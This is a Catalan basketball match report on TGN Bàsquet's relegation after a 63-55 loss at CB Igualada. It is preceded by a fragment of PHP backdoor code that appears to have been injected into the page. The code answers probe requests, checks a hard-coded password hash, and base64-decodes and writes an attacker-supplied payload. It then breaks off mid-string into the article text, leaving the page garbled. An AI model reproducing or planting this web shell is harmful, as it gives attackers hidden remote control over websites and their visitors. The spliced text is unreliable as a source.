function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior no pot guanyar a Igualada i consuma el descens de categoria (63-55) - Tgn Bàsquet Club -

El sènior no pot guanyar a Igualada i consuma el descens de categoria (63-55)

Updated: juny 9, 2019

L’equip sènior del TGN Bàsquet ha perdut la categoria aquest vespre després de caure en el tercer i definitiu partit de la promoció de permanència contra el CB Igualada. Les liles, que jugaven a pista contrària, havien forçat el desempat la setmana passada al Sagrat Cor però no han pogut mantenir la bona línia de joc d’aquell matx i han caigut contra un rival intens i que ha sabut aprofitar els seus moments.

El TGN Bàsquet, que ha demostrat caràcter en el moment que les coses estaven més complicades, no ha tingut la continuïtat necessària en el seu joc i deixa la màxima categoria del bàsquet català, Copa Catalunya Femenina, després de quatre temporades de ser-hi.

La primera meitat ha estat marcada pels nervis dels dos equips. Anotar costava tot un món i cada punt valia el seu pes en or. Les liles tenien clar el pla: una defensa en zona que convidava a les locals a llençar i, en atac, pilotes a Hughes al pal baix. El pla ha funcionat prou bé. Les igualadines tenien poc encert en el tir exterior, l’anticipació defensiva del TGN Bàsquet era bona i es podia córrer el contraatac, però va faltar encert. El partit estava molt igualat tot i que les liles mantenien la capdavantera (8-10 a 1:53 del final del 1Q).

En el segon període, la dinàmica ha estat la mateixa, si més no, al començament. Cada cistella ha arribat en comptagotes tot i que les sensacions eren bones. L’Igualada anotava poc i això afavoria els interessos del TGN Bàsquet. Les de l’Anoia han trobat la seva font de supervivència en els tirs des de la llarga distància (tot i que només han anotat 2 triples en els primers vint minuts —per cap del TGN Bàsquet). Hughes ha marcat les diferències a la zona i s’ha vist una Peña molt activa, però el marcador s’ha mogut poc fins que les locals han trobat la inspiració en els últims 2 minuts i 40 segons. El conjunt de l’Anoia ha fet un parcial de 9-0 que ha deixat el marcador en 29-20. Nou punts no eren una barbaritat però en un matx amb tan poca anotació, era significatiu.

L’enfonsament

El panorama en el tercer quart no ha estat gens engrescador. El CB Igualada ha intensificat la seva defensa, s’ha inspirat en atac i ha obert una escletxa important que feia mal a les tarragonines, que no s’han rendit, però. Les locals han gaudit de diferències per sobre dels sis punts (34-28 a 6:15 pel final del 3Q) i semblava que tenien el partit controlat. I més quan l’escletxa es va fer més gran. El CB Igualada, en tromba en aquests minuts, ha aprofitat la falta de clarividència ofensiva de les tarragonines per aconseguir un avantatge de fins a 17 punts, tot just en el final del període: 47-30.

Tot semblava perdut però en l’ADN del TGN Bàsquet no hi apareix la paraula rendició i les noies que entrena Juan Carlos Arjona han reaccionat excel·lentment i, després d’un 49-32 a 9 minuts pel final del partit, han fet un esplèndid parcial de 0-11 en tres minuts i mig que obria les esperances de victòria (49-43 a 5:34 pel final del partit). Amb tot obert, però, el CB Igualada s’ha refet i ha mantingut una diferència de 10 punts favorable gràcies a alguns tirs exteriors salvadors (55-45 a 3:26 del final).

El TGN Bàsquet ho ha provat, s’hi ha deixat la pell però li ha faltat encert i fluïdesa en el joc. El fet de no poder culminar la remuntada ha estat un llast mental important i més amb el cronòmetre en contra. Al final, la derrota ha estat un fet i les tarragonines han consumat el descens després de quatre temporades seguides a la màxima divisió catalana, la Copa Catalunya.